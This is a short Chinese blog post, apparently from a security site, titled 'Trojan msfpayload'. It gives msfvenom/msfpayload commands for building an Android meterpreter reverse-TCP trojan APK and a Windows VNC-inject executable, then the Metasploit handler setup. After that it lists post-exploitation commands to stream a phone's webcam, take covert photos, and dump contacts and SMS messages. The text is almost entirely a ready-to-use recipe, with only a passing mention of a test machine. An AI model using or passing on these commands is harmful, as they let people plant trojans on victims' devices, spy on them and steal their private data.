关注我们

木马msfpayload

NorthPole2ONorthPole2O 安全文摘 2019-11-13 7230 0


输入msfpayload –h

输入msfpayload -l 查看可以使用的模块。

安卓木马后门:msfvenom -p android/meterpreter/reverse_tcp LHOST=kaliip LPORT=5555 R > /root/apk.apk


win的木马后门就是:msfpayload windows/x64/vncinject/bind tcp LHOST=kaliip LPORT=5555 X >run.exe


产生的文件导出到要进行实验的机器上安装并授权才可以继续完成。


启动 msfconsole

设置use exploit/multi/handler

set payload android/meterpreter/reverse_tcp

show options

木马触发地址set LHOST (本机ip)

触发端口set LPORT 5555

开始监听exploit

webcam_list 查看手机有多少个摄像头 这里显示是2

 

webcam_stream  //开启摄像头

 

webcam_snap //隐秘拍照功能

dump_contacts //导出电话号码

dump_sms  //导出信息

可以输入?查看更多命令

木马msfpayload


版权声明

本文仅代表作者观点,不代表黑白网立场。
如文章侵犯了您的权利,请通过邮箱联系我们删除。
详情查看:版权纠纷
E-Mail:server@heibai.org

喜欢0发布评论

评论列表

发表评论

  • 昵称(必填)
  • 邮箱
  • 网址